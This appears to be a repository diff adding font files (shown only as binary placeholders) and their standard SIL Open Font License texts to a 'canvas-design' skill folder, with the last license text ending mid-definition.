skills/canvas-design/canvas-fonts/GeistMono-Bold.ttf
Normal file
Binary file not shown.
93
skills/canvas-design/canvas-fonts/GeistMono-OFL.txt
Normal file
93
skills/canvas-design/canvas-fonts/GeistMono-OFL.txt
Normal file
@@ -0,0 +1,93 @@
|
|||||||
|
Copyright 2024 The Geist Project Authors (https://github.com/vercel/geist-font.git)
|
||||||
|
|
||||||
|
This Font Software is licensed under the SIL Open Font License, Version 1.1.
|
||||||
|
This license is copied below, and is also available with a FAQ at:
|
||||||
|
https://openfontlicense.org
|
||||||
|
|
||||||
|
|
||||||
|
-----------------------------------------------------------
|
||||||
|
SIL OPEN FONT LICENSE Version 1.1 - 26 February 2007
|
||||||
|
-----------------------------------------------------------
|
||||||
|
|
||||||
|
PREAMBLE
|
||||||
|
The goals of the Open Font License (OFL) are to stimulate worldwide
|
||||||
|
development of collaborative font projects, to support the font creation
|
||||||
|
efforts of academic and linguistic communities, and to provide a free and
|
||||||
|
open framework in which fonts may be shared and improved in partnership
|
||||||
|
with others.
|
||||||
|
|
||||||
|
The OFL allows the licensed fonts to be used, studied, modified and
|
||||||
|
redistributed freely as long as they are not sold by themselves. The
|
||||||
|
fonts, including any derivative works, can be bundled, embedded,
|
||||||
|
redistributed and/or sold with any software provided that any reserved
|
||||||
|
names are not used by derivative works. The fonts and derivatives,
|
||||||
|
however, cannot be released under any other type of license. The
|
||||||
|
requirement for fonts to remain under this license does not apply
|
||||||
|
to any document created using the fonts or their derivatives.
|
||||||
|
|
||||||
|
DEFINITIONS
|
||||||
|
"Font Software" refers to the set of files released by the Copyright
|
||||||
|
Holder(s) under this license and clearly marked as such. This may
|
||||||
|
include source files, build scripts and documentation.
|
||||||
|
|
||||||
|
"Reserved Font Name" refers to any names specified as such after the
|
||||||
|
copyright statement(s).
|
||||||
|
|
||||||
|
"Original Version" refers to the collection of Font Software components as
|
||||||
|
distributed by the Copyright Holder(s).
|
||||||
|
|
||||||
|
"Modified Version" refers to any derivative made by adding to, deleting,
|
||||||
|
or substituting -- in part or in whole -- any of the components of the
|
||||||
|
Original Version, by changing formats or by porting the Font Software to a
|
||||||
|
new environment.
|
||||||
|
|
||||||
|
"Author" refers to any designer, engineer, programmer, technical
|
||||||
|
writer or other person who contributed to the Font Software.
|
||||||
|
|
||||||
|
PERMISSION & CONDITIONS
|
||||||
|
Permission is hereby granted, free of charge, to any person obtaining
|
||||||
|
a copy of the Font Software, to use, study, copy, merge, embed, modify,
|
||||||
|
redistribute, and sell modified and unmodified copies of the Font
|
||||||
|
Software, subject to the following conditions:
|
||||||
|
|
||||||
|
1) Neither the Font Software nor any of its individual components,
|
||||||
|
in Original or Modified Versions, may be sold by itself.
|
||||||
|
|
||||||
|
2) Original or Modified Versions of the Font Software may be bundled,
|
||||||
|
redistributed and/or sold with any software, provided that each copy
|
||||||
|
contains the above copyright notice and this license. These can be
|
||||||
|
included either as stand-alone text files, human-readable headers or
|
||||||
|
in the appropriate machine-readable metadata fields within text or
|
||||||
|
binary files as long as those fields can be easily viewed by the user.
|
||||||
|
|
||||||
|
3) No Modified Version of the Font Software may use the Reserved Font
|
||||||
|
Name(s) unless explicit written permission is granted by the corresponding
|
||||||
|
Copyright Holder. This restriction only applies to the primary font name as
|
||||||
|
presented to the users.
|
||||||
|
|
||||||
|
4) The name(s) of the Copyright Holder(s) or the Author(s) of the Font
|
||||||
|
Software shall not be used to promote, endorse or advertise any
|
||||||
|
Modified Version, except to acknowledge the contribution(s) of the
|
||||||
|
Copyright Holder(s) and the Author(s) or with their explicit written
|
||||||
|
permission.
|
||||||
|
|
||||||
|
5) The Font Software, modified or unmodified, in part or in whole,
|
||||||
|
must be distributed entirely under this license, and must not be
|
||||||
|
distributed under any other license. The requirement for fonts to
|
||||||
|
remain under this license does not apply to any document created
|
||||||
|
using the Font Software.
|
||||||
|
|
||||||
|
TERMINATION
|
||||||
|
This license becomes null and void if any of the above conditions are
|
||||||
|
not met.
|
||||||
|
|
||||||
|
DISCLAIMER
|
||||||
|
THE FONT SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
|
||||||
|
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO ANY WARRANTIES OF
|
||||||
|
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT
|
||||||
|
OF COPYRIGHT, PATENT, TRADEMARK, OR OTHER RIGHT. IN NO EVENT SHALL THE
|
||||||
|
COPYRIGHT HOLDER BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
|
||||||
|
INCLUDING ANY GENERAL, SPECIAL, INDIRECT, INCIDENTAL, OR CONSEQUENTIAL
|
||||||
|
DAMAGES, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
|
||||||
|
FROM, OUT OF THE USE OR INABILITY TO USE THE FONT SOFTWARE OR FROM
|
||||||
|
OTHER DEALINGS IN THE FONT SOFTWARE.
|
||||||
BIN
skills/canvas-design/canvas-fonts/GeistMono-Regular.ttf
Normal file
BIN
skills/canvas-design/canvas-fonts/GeistMono-Regular.ttf
Normal file
Binary file not shown.
93
skills/canvas-design/canvas-fonts/Gloock-OFL.txt
Normal file
93
skills/canvas-design/canvas-fonts/Gloock-OFL.txt
Normal file
@@ -0,0 +1,93 @@
|
|||||||
|
Copyright 2022 The Gloock Project Authors (https://github.com/duartp/gloock)
|
||||||
|
|
||||||
|
This Font Software is licensed under the SIL Open Font License, Version 1.1.
|
||||||
|
This license is copied below, and is also available with a FAQ at:
|
||||||
|
https://openfontlicense.org
|
||||||
|
|
||||||
|
|
||||||
|
-----------------------------------------------------------
|
||||||
|
SIL OPEN FONT LICENSE Version 1.1 - 26 February 2007
|
||||||
|
-----------------------------------------------------------
|
||||||
|
|
||||||
|
PREAMBLE
|
||||||
|
The goals of the Open Font License (OFL) are to stimulate worldwide
|
||||||
|
development of collaborative font projects, to support the font creation
|
||||||
|
efforts of academic and linguistic communities, and to provide a free and
|
||||||
|
open framework in which fonts may be shared and improved in partnership
|
||||||
|
with others.
|
||||||
|
|
||||||
|
The OFL allows the licensed fonts to be used, studied, modified and
|
||||||
|
redistributed freely as long as they are not sold by themselves. The
|
||||||
|
fonts, including any derivative works, can be bundled, embedded,
|
||||||
|
redistributed and/or sold with any software provided that any reserved
|
||||||
|
names are not used by derivative works. The fonts and derivatives,
|
||||||
|
however, cannot be released under any other type of license. The
|
||||||
|
requirement for fonts to remain under this license does not apply
|
||||||
|
to any document created using the fonts or their derivatives.
|
||||||
|
|
||||||
|
DEFINITIONS
|
||||||
|
"Font Software" refers to the set of files released by the Copyright
|
||||||
|
Holder(s) under this license and clearly marked as such. This may
|
||||||
|
include source files, build scripts and documentation.
|
||||||
|
|
||||||
|
"Reserved Font Name" refers to any names specified as such after the
|
||||||
|
copyright statement(s).
|
||||||
|
|
||||||
|
"Original Version" refers to the collection of Font Software components as
|
||||||
|
distributed by the Copyright Holder(s).
|
||||||
|
|
||||||
|
"Modified Version" refers to any derivative made by adding to, deleting,
|
||||||
|
or substituting -- in part or in whole -- any of the components of the
|
||||||
|
Original Version, by changing formats or by porting the Font Software to a
|
||||||
|
new environment.
|
||||||
|
|
||||||
|
"Author" refers to any designer, engineer, programmer, technical
|
||||||
|
writer or other person who contributed to the Font Software.
|
||||||
|
|
||||||
|
PERMISSION & CONDITIONS
|
||||||
|
Permission is hereby granted, free of charge, to any person obtaining
|
||||||
|
a copy of the Font Software, to use, study, copy, merge, embed, modify,
|
||||||
|
redistribute, and sell modified and unmodified copies of the Font
|
||||||
|
Software, subject to the following conditions:
|
||||||
|
|
||||||
|
1) Neither the Font Software nor any of its individual components,
|
||||||
|
in Original or Modified Versions, may be sold by itself.
|
||||||
|
|
||||||
|
2) Original or Modified Versions of the Font Software may be bundled,
|
||||||
|
redistributed and/or sold with any software, provided that each copy
|
||||||
|
contains the above copyright notice and this license. These can be
|
||||||
|
included either as stand-alone text files, human-readable headers or
|
||||||
|
in the appropriate machine-readable metadata fields within text or
|
||||||
|
binary files as long as those fields can be easily viewed by the user.
|
||||||
|
|
||||||
|
3) No Modified Version of the Font Software may use the Reserved Font
|
||||||
|
Name(s) unless explicit written permission is granted by the corresponding
|
||||||
|
Copyright Holder. This restriction only applies to the primary font name as
|
||||||
|
presented to the users.
|
||||||
|
|
||||||
|
4) The name(s) of the Copyright Holder(s) or the Author(s) of the Font
|
||||||
|
Software shall not be used to promote, endorse or advertise any
|
||||||
|
Modified Version, except to acknowledge the contribution(s) of the
|
||||||
|
Copyright Holder(s) and the Author(s) or with their explicit written
|
||||||
|
permission.
|
||||||
|
|
||||||
|
5) The Font Software, modified or unmodified, in part or in whole,
|
||||||
|
must be distributed entirely under this license, and must not be
|
||||||
|
distributed under any other license. The requirement for fonts to
|
||||||
|
remain under this license does not apply to any document created
|
||||||
|
using the Font Software.
|
||||||
|
|
||||||
|
TERMINATION
|
||||||
|
This license becomes null and void if any of the above conditions are
|
||||||
|
not met.
|
||||||
|
|
||||||
|
DISCLAIMER
|
||||||
|
THE FONT SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
|
||||||
|
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO ANY WARRANTIES OF
|
||||||
|
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT
|
||||||
|
OF COPYRIGHT, PATENT, TRADEMARK, OR OTHER RIGHT. IN NO EVENT SHALL THE
|
||||||
|
COPYRIGHT HOLDER BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
|
||||||
|
INCLUDING ANY GENERAL, SPECIAL, INDIRECT, INCIDENTAL, OR CONSEQUENTIAL
|
||||||
|
DAMAGES, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
|
||||||
|
FROM, OUT OF THE USE OR INABILITY TO USE THE FONT SOFTWARE OR FROM
|
||||||
|
OTHER DEALINGS IN THE FONT SOFTWARE.
|
||||||
BIN
skills/canvas-design/canvas-fonts/Gloock-Regular.ttf
Normal file
BIN
skills/canvas-design/canvas-fonts/Gloock-Regular.ttf
Normal file
Binary file not shown.
BIN
skills/canvas-design/canvas-fonts/IBMPlexMono-Bold.ttf
Normal file
BIN
skills/canvas-design/canvas-fonts/IBMPlexMono-Bold.ttf
Normal file
Binary file not shown.
93
skills/canvas-design/canvas-fonts/IBMPlexMono-OFL.txt
Normal file
93
skills/canvas-design/canvas-fonts/IBMPlexMono-OFL.txt
Normal file
@@ -0,0 +1,93 @@
|
|||||||
|
Copyright © 2017 IBM Corp. with Reserved Font Name "Plex"
|
||||||
|
|
||||||
|
This Font Software is licensed under the SIL Open Font License, Version 1.1.
|
||||||
|
This license is copied below, and is also available with a FAQ at:
|
||||||
|
https://openfontlicense.org
|
||||||
|
|
||||||
|
|
||||||
|
-----------------------------------------------------------
|
||||||
|
SIL OPEN FONT LICENSE Version 1.1 - 26 February 2007
|
||||||
|
-----------------------------------------------------------
|
||||||
|
|
||||||
|
PREAMBLE
|
||||||
|
The goals of the Open Font License (OFL) are to stimulate worldwide
|
||||||
|
development of collaborative font projects, to support the font creation
|
||||||
|
efforts of academic and linguistic communities, and to provide a free and
|
||||||
|
open framework in which fonts may be shared and improved in partnership
|
||||||
|
with others.
|
||||||
|
|
||||||
|
The OFL allows the licensed fonts to be used, studied, modified and
|
||||||
|
redistributed freely as long as they are not sold by themselves. The
|
||||||
|
fonts, including any derivative works, can be bundled, embedded,
|
||||||
|
redistributed and/or sold with any software provided that any reserved
|
||||||
|
names are not used by derivative works. The fonts and derivatives,
|
||||||
|
however, cannot be released under any other type of license. The
|
||||||
|
requirement for fonts to remain under this license does not apply
|
||||||
|
to any document created using the fonts or their derivatives.
|
||||||
|
|
||||||
|
DEFINITIONS
|
||||||
|
"Font Software" refers to the set of files released by the Copyright
|
||||||
|
Holder(s) under this license and clearly marked as such. This may
|
||||||
|
include source files, build scripts and documentation.
|
||||||
|
|
||||||
|
"Reserved Font Name" refers to any names specified as such after the
|
||||||
|
copyright statement(s).
|
||||||
|
|
||||||
|
"Original Version" refers to the collection of Font Software components as
|
||||||
|
distributed by the Copyright Holder(s).
|
||||||
|
|
||||||
|
"Modified Version" refers to any derivative made by adding to, deleting,
|
||||||
|
or substituting -- in part or in whole -- any of the components of the
|
||||||
|
Original Version, by changing formats or by porting the Font Software to a
|
||||||
|
new environment.
|
||||||
|
|
||||||
|
"Author" refers to any designer, engineer, programmer, technical
|
||||||
|
writer or other person who contributed to the Font Software.
|
||||||
|
|
||||||
|
PERMISSION & CONDITIONS
|
||||||
|
Permission is hereby granted, free of charge, to any person obtaining
|
||||||
|
a copy of the Font Software, to use, study, copy, merge, embed, modify,
|
||||||
|
redistribute, and sell modified and unmodified copies of the Font
|
||||||
|
Software, subject to the following conditions:
|
||||||
|
|
||||||
|
1) Neither the Font Software nor any of its individual components,
|
||||||
|
in Original or Modified Versions, may be sold by itself.
|
||||||
|
|
||||||
|
2) Original or Modified Versions of the Font Software may be bundled,
|
||||||
|
redistributed and/or sold with any software, provided that each copy
|
||||||
|
contains the above copyright notice and this license. These can be
|
||||||
|
included either as stand-alone text files, human-readable headers or
|
||||||
|
in the appropriate machine-readable metadata fields within text or
|
||||||
|
binary files as long as those fields can be easily viewed by the user.
|
||||||
|
|
||||||
|
3) No Modified Version of the Font Software may use the Reserved Font
|
||||||
|
Name(s) unless explicit written permission is granted by the corresponding
|
||||||
|
Copyright Holder. This restriction only applies to the primary font name as
|
||||||
|
presented to the users.
|
||||||
|
|
||||||
|
4) The name(s) of the Copyright Holder(s) or the Author(s) of the Font
|
||||||
|
Software shall not be used to promote, endorse or advertise any
|
||||||
|
Modified Version, except to acknowledge the contribution(s) of the
|
||||||
|
Copyright Holder(s) and the Author(s) or with their explicit written
|
||||||
|
permission.
|
||||||
|
|
||||||
|
5) The Font Software, modified or unmodified, in part or in whole,
|
||||||
|
must be distributed entirely under this license, and must not be
|
||||||
|
distributed under any other license. The requirement for fonts to
|
||||||
|
remain under this license does not apply to any document created
|
||||||
|
using the Font Software.
|
||||||
|
|
||||||
|
TERMINATION
|
||||||
|
This license becomes null and void if any of the above conditions are
|
||||||
|
not met.
|
||||||
|
|
||||||
|
DISCLAIMER
|
||||||
|
THE FONT SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
|
||||||
|
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO ANY WARRANTIES OF
|
||||||
|
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT
|
||||||
|
OF COPYRIGHT, PATENT, TRADEMARK, OR OTHER RIGHT. IN NO EVENT SHALL THE
|
||||||
|
COPYRIGHT HOLDER BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
|
||||||
|
INCLUDING ANY GENERAL, SPECIAL, INDIRECT, INCIDENTAL, OR CONSEQUENTIAL
|
||||||
|
DAMAGES, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
|
||||||
|
FROM, OUT OF THE USE OR INABILITY TO USE THE FONT SOFTWARE OR FROM
|
||||||
|
OTHER DEALINGS IN THE FONT SOFTWARE.
|
||||||
BIN
skills/canvas-design/canvas-fonts/IBMPlexMono-Regular.ttf
Normal file
BIN
skills/canvas-design/canvas-fonts/IBMPlexMono-Regular.ttf
Normal file
Binary file not shown.
BIN
skills/canvas-design/canvas-fonts/IBMPlexSerif-Bold.ttf
Normal file
BIN
skills/canvas-design/canvas-fonts/IBMPlexSerif-Bold.ttf
Normal file
Binary file not shown.
BIN
skills/canvas-design/canvas-fonts/IBMPlexSerif-BoldItalic.ttf
Normal file
BIN
skills/canvas-design/canvas-fonts/IBMPlexSerif-BoldItalic.ttf
Normal file
Binary file not shown.
BIN
skills/canvas-design/canvas-fonts/IBMPlexSerif-Italic.ttf
Normal file
BIN
skills/canvas-design/canvas-fonts/IBMPlexSerif-Italic.ttf
Normal file
Binary file not shown.
BIN
skills/canvas-design/canvas-fonts/IBMPlexSerif-Regular.ttf
Normal file
BIN
skills/canvas-design/canvas-fonts/IBMPlexSerif-Regular.ttf
Normal file
Binary file not shown.
BIN
skills/canvas-design/canvas-fonts/InstrumentSans-Bold.ttf
Normal file
BIN
skills/canvas-design/canvas-fonts/InstrumentSans-Bold.ttf
Normal file
Binary file not shown.
BIN
skills/canvas-design/canvas-fonts/InstrumentSans-BoldItalic.ttf
Normal file
BIN
skills/canvas-design/canvas-fonts/InstrumentSans-BoldItalic.ttf
Normal file
Binary file not shown.
BIN
skills/canvas-design/canvas-fonts/InstrumentSans-Italic.ttf
Normal file
BIN
skills/canvas-design/canvas-fonts/InstrumentSans-Italic.ttf
Normal file
Binary file not shown.
93
skills/canvas-design/canvas-fonts/InstrumentSans-OFL.txt
Normal file
93
skills/canvas-design/canvas-fonts/InstrumentSans-OFL.txt
Normal file
@@ -0,0 +1,93 @@
|
|||||||
|
Copyright 2022 The Instrument Sans Project Authors (https://github.com/Instrument/instrument-sans)
|
||||||
|
|
||||||
|
This Font Software is licensed under the SIL Open Font License, Version 1.1.
|
||||||
|
This license is copied below, and is also available with a FAQ at:
|
||||||
|
https://openfontlicense.org
|
||||||
|
|
||||||
|
|
||||||
|
-----------------------------------------------------------
|
||||||
|
SIL OPEN FONT LICENSE Version 1.1 - 26 February 2007
|
||||||
|
-----------------------------------------------------------
|
||||||
|
|
||||||
|
PREAMBLE
|
||||||
|
The goals of the Open Font License (OFL) are to stimulate worldwide
|
||||||
|
development of collaborative font projects, to support the font creation
|
||||||
|
efforts of academic and linguistic communities, and to provide a free and
|
||||||
|
open framework in which fonts may be shared and improved in partnership
|
||||||
|
with others.
|
||||||
|
|
||||||
|
The OFL allows the licensed fonts to be used, studied, modified and
|
||||||
|
redistributed freely as long as they are not sold by themselves. The
|
||||||
|
fonts, including any derivative works, can be bundled, embedded,
|
||||||
|
redistributed and/or sold with any software provided that any reserved
|
||||||
|
names are not used by derivative works. The fonts and derivatives,
|
||||||
|
however, cannot be released under any other type of license. The
|
||||||
|
requirement for fonts to remain under this license does not apply
|
||||||
|
to any document created using the fonts or their derivatives.
|
||||||
|
|
||||||
|
DEFINITIONS
|
||||||
|
"Font Software" refers to the set of files released by the Copyright
|
||||||
|
Holder(s) under this license and clearly marked as such. This may
|
||||||
|
include source files, build scripts and documentation.
|
||||||
|
|
||||||
|
"Reserved Font Name" refers to any names specified as such after the
|
||||||
|
copyright statement(s).
|
||||||
|
|
||||||
|
"Original Version" refers to the collection of Font Software components as
|
||||||
|
distributed by the Copyright Holder(s).
|
||||||
|
|
||||||
|
"Modified Version" refers to any derivative made by adding to, deleting,
|
||||||
|
or substituting -- in part or in whole -- any of the components of the
|
||||||
|
Original Version, by changing formats or by porting the Font Software to a
|
||||||
|
new environment.
|
||||||
|
|
||||||
|
"Author" refers to any designer, engineer, programmer, technical
|
||||||
|
writer or other person who contributed to the Font Software.
|
||||||
|
|
||||||
|
PERMISSION & CONDITIONS
|
||||||
|
Permission is hereby granted, free of charge, to any person obtaining
|
||||||
|
a copy of the Font Software, to use, study, copy, merge, embed, modify,
|
||||||
|
redistribute, and sell modified and unmodified copies of the Font
|
||||||
|
Software, subject to the following conditions:
|
||||||
|
|
||||||
|
1) Neither the Font Software nor any of its individual components,
|
||||||
|
in Original or Modified Versions, may be sold by itself.
|
||||||
|
|
||||||
|
2) Original or Modified Versions of the Font Software may be bundled,
|
||||||
|
redistributed and/or sold with any software, provided that each copy
|
||||||
|
contains the above copyright notice and this license. These can be
|
||||||
|
included either as stand-alone text files, human-readable headers or
|
||||||
|
in the appropriate machine-readable metadata fields within text or
|
||||||
|
binary files as long as those fields can be easily viewed by the user.
|
||||||
|
|
||||||
|
3) No Modified Version of the Font Software may use the Reserved Font
|
||||||
|
Name(s) unless explicit written permission is granted by the corresponding
|
||||||
|
Copyright Holder. This restriction only applies to the primary font name as
|
||||||
|
presented to the users.
|
||||||
|
|
||||||
|
4) The name(s) of the Copyright Holder(s) or the Author(s) of the Font
|
||||||
|
Software shall not be used to promote, endorse or advertise any
|
||||||
|
Modified Version, except to acknowledge the contribution(s) of the
|
||||||
|
Copyright Holder(s) and the Author(s) or with their explicit written
|
||||||
|
permission.
|
||||||
|
|
||||||
|
5) The Font Software, modified or unmodified, in part or in whole,
|
||||||
|
must be distributed entirely under this license, and must not be
|
||||||
|
distributed under any other license. The requirement for fonts to
|
||||||
|
remain under this license does not apply to any document created
|
||||||
|
using the Font Software.
|
||||||
|
|
||||||
|
TERMINATION
|
||||||
|
This license becomes null and void if any of the above conditions are
|
||||||
|
not met.
|
||||||
|
|
||||||
|
DISCLAIMER
|
||||||
|
THE FONT SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
|
||||||
|
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO ANY WARRANTIES OF
|
||||||
|
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT
|
||||||
|
OF COPYRIGHT, PATENT, TRADEMARK, OR OTHER RIGHT. IN NO EVENT SHALL THE
|
||||||
|
COPYRIGHT HOLDER BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
|
||||||
|
INCLUDING ANY GENERAL, SPECIAL, INDIRECT, INCIDENTAL, OR CONSEQUENTIAL
|
||||||
|
DAMAGES, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
|
||||||
|
FROM, OUT OF THE USE OR INABILITY TO USE THE FONT SOFTWARE OR FROM
|
||||||
|
OTHER DEALINGS IN THE FONT SOFTWARE.
|
||||||
BIN
skills/canvas-design/canvas-fonts/InstrumentSans-Regular.ttf
Normal file
BIN
skills/canvas-design/canvas-fonts/InstrumentSans-Regular.ttf
Normal file
Binary file not shown.
BIN
skills/canvas-design/canvas-fonts/InstrumentSerif-Italic.ttf
Normal file
BIN
skills/canvas-design/canvas-fonts/InstrumentSerif-Italic.ttf
Normal file
Binary file not shown.
BIN
skills/canvas-design/canvas-fonts/InstrumentSerif-Regular.ttf
Normal file
BIN
skills/canvas-design/canvas-fonts/InstrumentSerif-Regular.ttf
Normal file
Binary file not shown.
93
skills/canvas-design/canvas-fonts/Italiana-OFL.txt
Normal file
93
skills/canvas-design/canvas-fonts/Italiana-OFL.txt
Normal file
@@ -0,0 +1,93 @@
|
|||||||
|
Copyright (c) 2011, Santiago Orozco (hi@typemade.mx), with Reserved Font Name "Italiana".
|
||||||
|
|
||||||
|
This Font Software is licensed under the SIL Open Font License, Version 1.1.
|
||||||
|
This license is copied below, and is also available with a FAQ at:
|
||||||
|
https://openfontlicense.org
|
||||||
|
|
||||||
|
|
||||||
|
-----------------------------------------------------------
|
||||||
|
SIL OPEN FONT LICENSE Version 1.1 - 26 February 2007
|
||||||
|
-----------------------------------------------------------
|
||||||
|
|
||||||
|
PREAMBLE
|
||||||
|
The goals of the Open Font License (OFL) are to stimulate worldwide
|
||||||
|
development of collaborative font projects, to support the font creation
|
||||||
|
efforts of academic and linguistic communities, and to provide a free and
|
||||||
|
open framework in which fonts may be shared and improved in partnership
|
||||||
|
with others.
|
||||||
|
|
||||||
|
The OFL allows the licensed fonts to be used, studied, modified and
|
||||||
|
redistributed freely as long as they are not sold by themselves. The
|
||||||
|
fonts, including any derivative works, can be bundled, embedded,
|
||||||
|
redistributed and/or sold with any software provided that any reserved
|
||||||
|
names are not used by derivative works. The fonts and derivatives,
|
||||||
|
however, cannot be released under any other type of license. The
|
||||||
|
requirement for fonts to remain under this license does not apply
|
||||||
|
to any document created using the fonts or their derivatives.
|
||||||
|
|
||||||
|
DEFINITIONS
|
||||||
|
"Font Software" refers to the set of files released by the Copyright
|
||||||
|
Holder(s) under this license and clearly marked as such. This may
|
||||||
|
include source files, build scripts and documentation.
|
||||||
|
|
||||||
|
"Reserved Font Name" refers to any names specified as such after the
|
||||||
|
copyright statement(s).
|
||||||
|
|
||||||
|
"Original Version" refers to the collection of Font Software components as
|
||||||
|
distributed by the Copyright Holder(s).
|
||||||
|
|
||||||
|
"Modified Version" refers to any derivative made by adding to, deleting,
|
||||||
|
or substituting -- in part or in whole -- any of the components of the
|
||||||
|
Original Version, by changing formats or by porting the Font Software to a
|
||||||
|
new environment.
|
||||||
|
|
||||||
|
"Author" refers to any designer, engineer, programmer, technical
|
||||||
|
writer or other person who contributed to the Font Software.
|
||||||
|
|
||||||
|
PERMISSION & CONDITIONS
|
||||||
|
Permission is hereby granted, free of charge, to any person obtaining
|
||||||
|
a copy of the Font Software, to use, study, copy, merge, embed, modify,
|
||||||
|
redistribute, and sell modified and unmodified copies of the Font
|
||||||
|
Software, subject to the following conditions:
|
||||||
|
|
||||||
|
1) Neither the Font Software nor any of its individual components,
|
||||||
|
in Original or Modified Versions, may be sold by itself.
|
||||||
|
|
||||||
|
2) Original or Modified Versions of the Font Software may be bundled,
|
||||||
|
redistributed and/or sold with any software, provided that each copy
|
||||||
|
contains the above copyright notice and this license. These can be
|
||||||
|
included either as stand-alone text files, human-readable headers or
|
||||||
|
in the appropriate machine-readable metadata fields within text or
|
||||||
|
binary files as long as those fields can be easily viewed by the user.
|
||||||
|
|
||||||
|
3) No Modified Version of the Font Software may use the Reserved Font
|
||||||
|
Name(s) unless explicit written permission is granted by the corresponding
|
||||||
|
Copyright Holder. This restriction only applies to the primary font name as
|
||||||
|
presented to the users.
|
||||||
|
|
||||||
|
4) The name(s) of the Copyright Holder(s) or the Author(s) of the Font
|
||||||
|
Software shall not be used to promote, endorse or advertise any
|
||||||
|
Modified Version, except to acknowledge the contribution(s) of the
|
||||||
|
Copyright Holder(s) and the Author(s) or with their explicit written
|
||||||
|
permission.
|
||||||
|
|
||||||
|
5) The Font Software, modified or unmodified, in part or in whole,
|
||||||
|
must be distributed entirely under this license, and must not be
|
||||||
|
distributed under any other license. The requirement for fonts to
|
||||||
|
remain under this license does not apply to any document created
|
||||||
|
using the Font Software.
|
||||||
|
|
||||||
|
TERMINATION
|
||||||
|
This license becomes null and void if any of the above conditions are
|
||||||
|
not met.
|
||||||
|
|
||||||
|
DISCLAIMER
|
||||||
|
THE FONT SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
|
||||||
|
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO ANY WARRANTIES OF
|
||||||
|
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT
|
||||||
|
OF COPYRIGHT, PATENT, TRADEMARK, OR OTHER RIGHT. IN NO EVENT SHALL THE
|
||||||
|
COPYRIGHT HOLDER BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
|
||||||
|
INCLUDING ANY GENERAL, SPECIAL, INDIRECT, INCIDENTAL, OR CONSEQUENTIAL
|
||||||
|
DAMAGES, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
|
||||||
|
FROM, OUT OF THE USE OR INABILITY TO USE THE FONT SOFTWARE OR FROM
|
||||||
|
OTHER DEALINGS IN THE FONT SOFTWARE.
|
||||||
BIN
skills/canvas-design/canvas-fonts/Italiana-Regular.ttf
Normal file
BIN
skills/canvas-design/canvas-fonts/Italiana-Regular.ttf
Normal file
Binary file not shown.
BIN
skills/canvas-design/canvas-fonts/JetBrainsMono-Bold.ttf
Normal file
BIN
skills/canvas-design/canvas-fonts/JetBrainsMono-Bold.ttf
Normal file
Binary file not shown.
93
skills/canvas-design/canvas-fonts/JetBrainsMono-OFL.txt
Normal file
93
skills/canvas-design/canvas-fonts/JetBrainsMono-OFL.txt
Normal file
@@ -0,0 +1,93 @@
|
|||||||
|
Copyright 2020 The JetBrains Mono Project Authors (https://github.com/JetBrains/JetBrainsMono)
|
||||||
|
|
||||||
|
This Font Software is licensed under the SIL Open Font License, Version 1.1.
|
||||||
|
This license is copied below, and is also available with a FAQ at:
|
||||||
|
https://openfontlicense.org
|
||||||
|
|
||||||
|
|
||||||
|
-----------------------------------------------------------
|
||||||
|
SIL OPEN FONT LICENSE Version 1.1 - 26 February 2007
|
||||||
|
-----------------------------------------------------------
|
||||||
|
|
||||||
|
PREAMBLE
|
||||||
|
The goals of the Open Font License (OFL) are to stimulate worldwide
|
||||||
|
development of collaborative font projects, to support the font creation
|
||||||
|
efforts of academic and linguistic communities, and to provide a free and
|
||||||
|
open framework in which fonts may be shared and improved in partnership
|
||||||
|
with others.
|
||||||
|
|
||||||
|
The OFL allows the licensed fonts to be used, studied, modified and
|
||||||
|
redistributed freely as long as they are not sold by themselves. The
|
||||||
|
fonts, including any derivative works, can be bundled, embedded,
|
||||||
|
redistributed and/or sold with any software provided that any reserved
|
||||||
|
names are not used by derivative works. The fonts and derivatives,
|
||||||
|
however, cannot be released under any other type of license. The
|
||||||
|
requirement for fonts to remain under this license does not apply
|
||||||
|
to any document created using the fonts or their derivatives.
|
||||||
|
|
||||||
|
DEFINITIONS
|
||||||
|
"Font Software" refers to the set of files released by the Copyright
|
||||||
|
Holder(s) under this license and clearly marked as such. This may
|
||||||
|
include source files, build scripts and documentation.
|
||||||
|
|
||||||
|
"Reserved Font Name" refers to any names specified as such after the
|
||||||
|
copyright statement(s).
|
||||||
|
|
||||||
|
"Original Version" refers to the collection of Font Software components as
|
||||||
|
distributed by the Copyright Holder(s).
|
||||||
|
|
||||||
|
"Modified Version" refers to any derivative made by adding to, deleting,
|
||||||
|
or substituting -- in part or in whole -- any of the components of the
|
||||||
|
Original Version, by changing formats or by porting the Font Software to a
|
||||||
|
new environment.
|
||||||
|
|
||||||
|
"Author" refers to any designer, engineer, programmer, technical
|
||||||
|
